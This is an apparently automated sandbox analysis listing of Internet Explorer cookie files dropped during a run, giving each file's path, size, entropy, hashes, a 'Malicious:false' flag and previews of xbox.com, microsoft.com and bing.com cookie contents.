                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:atdmt.com/
                                                                                                                                                                                                              Preview: ATN.1.1620825699.15862217283903619099.AYJ-XHgq0EKRt6-CB0g.atdmt.com/.2147492864.2937926528.31032532.661012180.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\A37S713A.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):391
                                                                                                                                                                                                              Entropy (8bit):4.998809432273796
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:fdwVgCTDEXbwIhssUUAZ+mTDMTV3G0vRmjFUvHxTDMTVSQ4CE:lw1iNUDuzmjFUvH9JCE
                                                                                                                                                                                                              MD5:D194480E21435DE369C5830CB3A0831D
                                                                                                                                                                                                              SHA1:8520950903DD8EA8CA828398C5D4A5E0EF4871E3
                                                                                                                                                                                                              SHA-256:87C30F100AE35D678C3E0DBC0E89B89F5024AF60DF8149A8F0C2F0DB32E9A5AF
                                                                                                                                                                                                              SHA-512:1D1E554A0D620DCCB7FE33091D40EF97E8742513CA0775E03C44197C3446905F2BE021D73E8A09916FC01460C7B33DF3E24A8122D7A1D797B954664122653346
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: EXPID.26493f44-f65d-403a-b917-a0ea2ea94303.support.microsoft.com/.9217.2036602624.30959106.1782963044.30885756.*.MicrosoftApplicationsTelemetryDeviceId.2537901c-f6e2-4d47-aabe-716f4e285677.support.microsoft.com/.1601.3864055424.30959181.1843023150.30885756.*.ai_session.wx84LX6Z6xYlTnVRXca0Cd|1620857777572|1620857777572.support.microsoft.com/.1601.2657895040.30885760.1843491151.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AWIF3G17.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):832
                                                                                                                                                                                                              Entropy (8bit):4.799545603998311
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:vQJpXmhjsvhK9ic2O6RPTVrbqtJTVeThnsTVwUS8c5NzQTVttslTRHXYjTVi9XJI:vQJNmiprjOos69ljVKylJXYE/0n
                                                                                                                                                                                                              MD5:4661166C575C1731979B608D0F633EBB
                                                                                                                                                                                                              SHA1:C4F0F32549D7C93E9EA616F38D35127BAF89D0F8
                                                                                                                                                                                                              SHA-256:DEC2305D6DDE5CCF7FDBFE114615C8733B562B757D48D1CDD44A21CDB96302A1
                                                                                                                                                                                                              SHA-512:03D93D32D778293A6A4786CF4BD522635A8ADEF6DDEC5CC7139185BABCAA8363C21AAE9CED655CC64E05D44500511F0391C182AB05E6064EF9389DEED8936F7E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*._cs_c.0.xbox.com/.1601.1804203904.30965301.686504450.30885757.*.__CT_Data.gpv=1&ckp=tld&dm=xbox.com&apv_1002_www32=1&cpv_1002_www32=1.xbox.com/.1600.2719088128.30959182.696538469.30885757.*._cs_id.5bfeb22c-810a-af41-b542-7da132b42761.1620858092.1.1620858092.1620858092.1613561419.1655022092366.None.1.xbox.com/.1601.1814203904.30965301.696538469.30885757.*._cs_s.1.1.xbox.com/.1601.1512927744.30885761.696538469.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\BDJDNJZO.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):798
                                                                                                                                                                                                              Entropy (8bit):4.742394067386889
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:vQJpXmhjsvhK9ic2O6RPTVrbqtJTVeThnsTVwUS8c2TVtucslTRHXYjTVi9XJLrw:vQJNmiprjOos69liuZlJXYE/0n
                                                                                                                                                                                                              MD5:9EF700AAC9AC3D9BC11A7E85ADAD3501
                                                                                                                                                                                                              SHA1:96FDFF671B42DB8B1CF8F3F9B675F1F9BFB0CB17
                                                                                                                                                                                                              SHA-256:AA6127B3FBE12A6273C342407DEF08EAD0D7BBCDD264CF1BF9B31BC132CB8B5A
                                                                                                                                                                                                              SHA-512:F0015A6A38ADC0FFB0A490DDA08E9C6DF966E477962060BB7714254F1BD7694B20705E745ACDF9FA2A323734AF8F3D1CEC4F4DFD7093FBD006607DEED965E926
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*._cs_c.0.xbox.com/.1601.1804203904.30965301.686504450.30885757.*.__CT_Data.gpv=1&ckp=tld&dm=xbox.com.xbox.com/.1600.2719088128.30959182.696070468.30885757.*._cs_id.5bfeb22c-810a-af41-b542-7da132b42761.1620858092.1.1620858092.1620858092.1613561419.1655022092366.None.1.xbox.com/.1601.1814203904.30965301.696538469.30885757.*._cs_s.1.1.xbox.com/.1601.1512927744.30885761.696538469.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\D15OE3FM.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):565
                                                                                                                                                                                                              Entropy (8bit):4.819444213751252
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:vQJpXmhjsvhK9ic2O6RPTVrbqtJTVeThnsTVwUS8c2TVtuY:vQJNmiprjOos69liuY
                                                                                                                                                                                                              MD5:4DD052B038EEBD64DEBE71B2CF9AB692
                                                                                                                                                                                                              SHA1:CF895E560261F4EF256AD94B42A8677F9E94E26B
                                                                                                                                                                                                              SHA-256:84D8CE5A16988D7A2384FF214D954196B1ED24B5F1EE56AC3CF513C37EE2790D
                                                                                                                                                                                                              SHA-512:8B2D8CCF2CA69A26E1B4BA0147E8461683B9A9992108653CE779941953C7712434E2FEA5EF2537C1D361FC52819EB53D3A67138D8C46B63F5901EB7ABA0373B3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*._cs_c.0.xbox.com/.1601.1804203904.30965301.686504450.30885757.*.__CT_Data.gpv=1&ckp=tld&dm=xbox.com.xbox.com/.1600.2719088128.30959182.696070468.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\DQUBYYSW.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1011
                                                                                                                                                                                                              Entropy (8bit):4.806637918569605
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:vQJNmiprjOos69ljVMKhTKelJXYE/0xn5we3:IJNFxjOM/VMxn93
                                                                                                                                                                                                              MD5:FBF5BC3F39EC29CE8C7F6A92810C65DB
                                                                                                                                                                                                              SHA1:F09138E6EC4E2D2A33D0C9192B72E8D232D4D12F
                                                                                                                                                                                                              SHA-256:289702BBD9645E120413185F20A17F70CBD7BD9F871FE085FFBFF0022D02C925
                                                                                                                                                                                                              SHA-512:DC414E1B4713982F9CB1861F3F2CA81C15497D097C3F5C498FD91803F09188B463AD6885ADE0FEA27B71DA7E033C4E29E4EFAC5B1C8D5A024F8564025168D682
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:xbox.com/
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*._cs_c.0.xbox.com/.1601.1804203904.30965301.686504450.30885757.*.__CT_Data.gpv=1&ckp=tld&dm=xbox.com&apv_1002_www32=1&cpv_1002_www32=1&rpv_1002_www32=1.xbox.com/.1600.2729088128.30959182.710046532.30885757.*._cs_id.5bfeb22c-810a-af41-b542-7da132b42761.1620858092.1.1620858092.1620858092.1613561419.1655022092366.None.1.xbox.com/.1601.1814203904.30965301.696538469.30885757.*._cs_s.1.1.xbox.com/.1601.1512927744.30885761.696538469.30885757.*._CT_RS_.Recording.xbox.com/.1600.575165568.30891792.707082527.30885757.*.WRUIDCD03072018.3289174904963098.xbox.com/.1600.2729088128.30959182.707082527.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\E99YBKMW.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):231
                                                                                                                                                                                                              Entropy (8bit):4.798920869608414
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Tyw+JjwXg+DMVX6Qqh3PhIhDlEeDMVXNuWtSYGcvWl:Tyw+JjwDDM9qh3PhqlvDM9AWtSYvWl
                                                                                                                                                                                                              MD5:BB0EFF4AF1795343687549DE7EFAFC5B
                                                                                                                                                                                                              SHA1:07D2B72EA7B9D8CB1639FE757486E66D69CAF8FD
                                                                                                                                                                                                              SHA-256:B7A4372DA005D470AA23EAB0BC383126CDCA93E02BC52632FF22448E91CD8DED
                                                                                                                                                                                                              SHA-512:90C972BB9EB4758C1D5AF377A906575C55DE09EBAF6CA334225BE20FE214649713C36EF8977DE4DCDF9F8689CF99EC661983C7F4CEDAFFC45498EE6B71556D3C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MC1.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.microsoft.com/.1025.2106602624.30959106.1850043162.30885756.*.MS-CV.A9so15JmkkaOfhL8.2.microsoft.com/.1024.3661884928.30885882.435616785.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ELASEYB3.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                              Entropy (8bit):4.684783757038948
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:vQJldJXVYKdSlRC6svhwJVX6hc2O6XHmOKdWTVt4M3Iww0:vQJpXmhjsvhK9ic2O6PpTVtX4wf
                                                                                                                                                                                                              MD5:0CD4AA0F9619600FFA3F0067DC8BD3E1
                                                                                                                                                                                                              SHA1:A82C1F5BF89C3AC27647F960C7149A4734B16A98
                                                                                                                                                                                                              SHA-256:30A8F82DA53A2CBDD69765C6D2B1C1812ED6ABE5813DEE03E567F363742A00FF
                                                                                                                                                                                                              SHA-512:9238D69E7009ACDEA48F4D8234214F62C3A6A1B23FF1A4C4BCE3B53B26C00B573C92070C912A739DACACE318405994E312029A3FD8A50F51148F78B222714E86
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948.xbox.com/.1600.2072927744.30885761.642997943.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\EOGJHS2C.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):994
                                                                                                                                                                                                              Entropy (8bit):4.789893891298981
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:vQJpXmhjsvhK9ic2O6RPTVrbqtJTVeThnsTVwUS8c5NzQTVttslTRHXYjTVi9XJE:vQJNmiprjOos69ljVKylJXYE/0xn5we3
                                                                                                                                                                                                              MD5:9FAD85FECAC873C1CD3D715B3BF94448
                                                                                                                                                                                                              SHA1:8C18BCF625A4EA68E620FDFC2C8C81B3FB0E2FB3
                                                                                                                                                                                                              SHA-256:E2EC7DB3AB5ABA6B5D9B9E73E60EECFBE0F98F3A5E108135E01549CB8CA8884D
                                                                                                                                                                                                              SHA-512:BD8607E2A694271A1A8CA7986D64B18528F7D34705A93F47B38DF039980B3A0CEF46C0DE8999157656AE490968609629EC886BA634F575250BEB32EAC18BE101
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*._cs_c.0.xbox.com/.1601.1804203904.30965301.686504450.30885757.*.__CT_Data.gpv=1&ckp=tld&dm=xbox.com&apv_1002_www32=1&cpv_1002_www32=1.xbox.com/.1600.2719088128.30959182.696538469.30885757.*._cs_id.5bfeb22c-810a-af41-b542-7da132b42761.1620858092.1.1620858092.1620858092.1613561419.1655022092366.None.1.xbox.com/.1601.1814203904.30965301.696538469.30885757.*._cs_s.1.1.xbox.com/.1601.1512927744.30885761.696538469.30885757.*._CT_RS_.Recording.xbox.com/.1600.575165568.30891792.707082527.30885757.*.WRUIDCD03072018.3289174904963098.xbox.com/.1600.2729088128.30959182.707082527.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F26KUW6U.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                              Entropy (8bit):4.826891795791635
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Tyw+JjwXg+DMVX6Qqh3PhIhDl7DMVX4WtSFmQNRUTU7DhE52fSUzQ0:Tyw+JjwDDM9qh3Phql7DM94WtSoMMU7V
                                                                                                                                                                                                              MD5:3DFD6AE7CC1C15C674A13C0EC105096E
                                                                                                                                                                                                              SHA1:F557F9E69E3AD2750E2CA577335C98B03AEF4AEF
                                                                                                                                                                                                              SHA-256:59DB0CC125862E29E31BB73232579A074DF8337F74A3895DB0463095F7D007EC
                                                                                                                                                                                                              SHA-512:9111480949A2F9F6421DF29CB5B7BE0549AC411E8ED0985143BB36736810DD1031B270C63D5DABD289C2D67DB04B4D717DFF36A2532F991066D24C205125123C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MC1.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.microsoft.com/.1025.2106602624.30959106.1850043162.30885756.*.MS-CV.A9so15JmkkaOfhL8.6.microsoft.com/.1024.3791884928.30885882.558510074.30885757.*.MUID.30EB4AA1B7BE6C541D955A94B3BE6A61.microsoft.com/.2147484673.1521103744.30964136.663012210.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\FAUIZNSD.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):259
                                                                                                                                                                                                              Entropy (8bit):4.901265454383875
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:fOcZuVgkLIMZDEXbFeIhssCPrXErTAMe8vYLIMZDMTV3XJI0vESmjn:fdwVgCTDEXbwIhssUUAZ+mTDMTV3G0vi
                                                                                                                                                                                                              MD5:AF985FFB585C03A3B6900438D4942F2A
                                                                                                                                                                                                              SHA1:34AD4D5FFA836641F52471AF35BE3AF45A27AF21
                                                                                                                                                                                                              SHA-256:3B7CA49838161DCBF71C527B79853009164A6C2884D715FFC98EC49EC5E47A78
                                                                                                                                                                                                              SHA-512:E2A39809C167CB3C8114B4EC24459632E9BB06F41EE81D3D556582D8FDE26BE523E5B048682D37E434961041F574FC8EC8AA687C09EF24FD2B517A697115D8B3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: EXPID.26493f44-f65d-403a-b917-a0ea2ea94303.support.microsoft.com/.9217.2036602624.30959106.1782963044.30885756.*.MicrosoftApplicationsTelemetryDeviceId.2537901c-f6e2-4d47-aabe-716f4e285677.support.microsoft.com/.1601.3864055424.30959181.1843023150.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\FC0JXTBC.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):231
                                                                                                                                                                                                              Entropy (8bit):4.80158793885195
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Tyw+JjwXg+DMVX6Qqh3PhIhDlBDMVXWuWtSceetQ0:Tyw+JjwDDM9qh3PhqlBDM9WuWtSceKQ0
                                                                                                                                                                                                              MD5:38B2D10678692B063D48C930769A6D7E
                                                                                                                                                                                                              SHA1:3C6B4A28F46414FD4058ADF062A59484925502F6
                                                                                                                                                                                                              SHA-256:FD48C8A060FA37F4995940237FF0137FE7E885BD33AFBDD0383CD0B3B415425F
                                                                                                                                                                                                              SHA-512:7382CF2A44F45E6387E99D8004DD8A7803524BB0460D74760A547AB5F3BB9B5B8C324FA3FCBA474107C2C4AAB31BA55097C931DAE8EB59EE99F5BDCECAA6364B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MC1.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.microsoft.com/.1025.2106602624.30959106.1850043162.30885756.*.MS-CV.A9so15JmkkaOfhL8.4.microsoft.com/.1024.3701884928.30885882.475004280.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\FUKADVGL.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):231
                                                                                                                                                                                                              Entropy (8bit):4.7972905116652225
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Tyw+JjwXg+DMVX6Qqh3PhIhDlMDMVX2WtSexei0:Tyw+JjwDDM9qh3PhqlMDM92WtS+0
                                                                                                                                                                                                              MD5:7068D033CC6D1F7FAFD4F8FA9B342089
                                                                                                                                                                                                              SHA1:A30697B045571325679847343480E2099C274837
                                                                                                                                                                                                              SHA-256:AE3C6FDA0A14149BE495CF245CC1DABA63FF94F58E96C5E1AEF5D95F68154308
                                                                                                                                                                                                              SHA-512:07CC04786566BF096E667B3ACDF0C9BB9CE9A9D67A17A8E9D73B1A90D95C06DCFC7452CADB1BD3D1BF1B162794ABEA9695976D5B8DE087BA07FF1163651ED318
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MC1.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.microsoft.com/.1025.2106602624.30959106.1850043162.30885756.*.MS-CV.A9so15JmkkaOfhL8.3.microsoft.com/.1024.3681884928.30885882.459504042.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HEKP3ECX.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):553
                                                                                                                                                                                                              Entropy (8bit):4.792336144643305
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:vQJpXmhjsvhK9ic2O6RPTVrbqtJTVeThnsTVwUSmTVtB:vQJNmiprjOos69lgB
                                                                                                                                                                                                              MD5:E5E95E39A89B29B0561F66E200C91BCD
                                                                                                                                                                                                              SHA1:75F77E5984695C45DCCD371A3DB1DF2B74274CCA
                                                                                                                                                                                                              SHA-256:B87A852D90B2831323C6615810C40807C47B06E496CEEEF964CA19A6A1F156B5
                                                                                                                                                                                                              SHA-512:C277C55AEEAC673628A5784B15CDC29A55164FF8DB8DB4787D9D3D1F9CEBEACBED479F958B3CBFEC24FEBD56FA9CF0B67E8E93AE9B169EA0182140F5E69CB2D5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*._cs_c.0.xbox.com/.1601.1804203904.30965301.686504450.30885757.*.__CT_Data.gpv=1&ckp=tld.xbox.com/.1600.2719088128.30959182.695134466.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HKGIZ3ZZ.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):231
                                                                                                                                                                                                              Entropy (8bit):4.806556073599315
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Tyw+JjwXg+DMVX6Qqh3PhIhDl/eDMVXAuWtSR1:Tyw+JjwDDM9qh3Phql/eDM9XWtSR1
                                                                                                                                                                                                              MD5:5B12E85FC5DE0E17760C067F77BF1201
                                                                                                                                                                                                              SHA1:935705EF651157AECE42291C1DE1049CBF2BBF0C
                                                                                                                                                                                                              SHA-256:FD8ABCED5A262F3E088B73B6A8F7AFDB62EEFD742DCF2A939DE9CD7F9AE80BF8
                                                                                                                                                                                                              SHA-512:6F13EEC5A2EC656C9950D5BFCA3CBFD3D0C21F3782D186108883C00E7EA3028DE9275283D661EC32BF86634142FCFA71568D069DC8F4A5582DFABE8525A59570
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MC1.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.microsoft.com/.1025.2106602624.30959106.1850043162.30885756.*.MS-CV.A9so15JmkkaOfhL8.5.microsoft.com/.1024.3761884928.30885882.536492857.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\IH2VTUQD.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):100
                                                                                                                                                                                                              Entropy (8bit):4.362027248030041
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:ershUjsUcFTgkqLXv7YeVUUVVqHWja7adS0n:KC6svhqt+UDW2IadS0
                                                                                                                                                                                                              MD5:0BA3E232D0E93B7BA3B7D7FF83EC772F
                                                                                                                                                                                                              SHA1:354DD443D44D46CE301CD9211E3294131E976B9A
                                                                                                                                                                                                              SHA-256:615B0CFD13E12B37B0133F1A107943AFC388F32FFC8244B4C40BD807D458149F
                                                                                                                                                                                                              SHA-512:F5C62DE0CEDAADBC502CCB78C2F5CEDF3D6D3C6DFAED40B204C176FF17560C662D75B7DD420CD4D88D9AFD2B830E8DB57F0C2678BB02813B231AB333FDA982C1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:bing.com/
                                                                                                                                                                                                              Preview: MUID.336584BA72BC6F9620B1948F76BC6EAC.bing.com/.2147484673.1501103744.30964136.636133931.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\IMVFNVZX.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):82
                                                                                                                                                                                                              Entropy (8bit):4.6028255235294
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:3H9oA20vpdfUQ2wXccNjm2Yn:3uA20vMXwXtNq2Y
                                                                                                                                                                                                              MD5:99A570AE6DB6203192594CD31BB6FF9A
                                                                                                                                                                                                              SHA1:7C3589170CD8EEF23D5077F87A0942AB64ECFA06
                                                                                                                                                                                                              SHA-256:B9746AF93C46B63B914DD901BFF1C568EF615F022851EE4D39A2E62F6D5FC546
                                                                                                                                                                                                              SHA-512:4CBB3636CF6A5D068DA69EBF1692B7E73B9CB29D25D87F88274DC9E330ED295C77E05344E484A9FB115BC773C249B148D6FB52C7C88402D341E834226F9CA2A0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: mobileOverride.desktop.www.xbox.com/.1536.871635328.30959107.622093907.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\IP2NVPOZ.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):73
                                                                                                                                                                                                              Entropy (8bit):4.443728367338533
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:vQJ2XArdafUQ2O+d2/T1N6ddQ0n:vQJldJXVYKdS0
                                                                                                                                                                                                              MD5:73C8017D074DBBCB9A2E829D8087AF95
                                                                                                                                                                                                              SHA1:8E25094B7E43722CEA6A304AFA4893123168374F
                                                                                                                                                                                                              SHA-256:3FA33CC81852EF1654428DB7E0B1D9D1FC3BCB01C4117B63B77A3DE51F7B340E
                                                                                                                                                                                                              SHA-512:4103B918D17A37FCC0CEC06617CCAA315E9A660541A0894E599CAB53225C1C961493935AD3EBF7D06850A026D041291DC47F3DFAA4D60F8CB4EEAFE4036427C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\JJ91K1EQ.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):110
                                                                                                                                                                                                              Entropy (8bit):3.977722807192827
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:+K63RJQUXTlvQXsZtOLv7YQWTQXTcSf/n:iJhpvQXs3cUQl
                                                                                                                                                                                                              MD5:9744A6FABDAD8993DA39F68E72854B9E
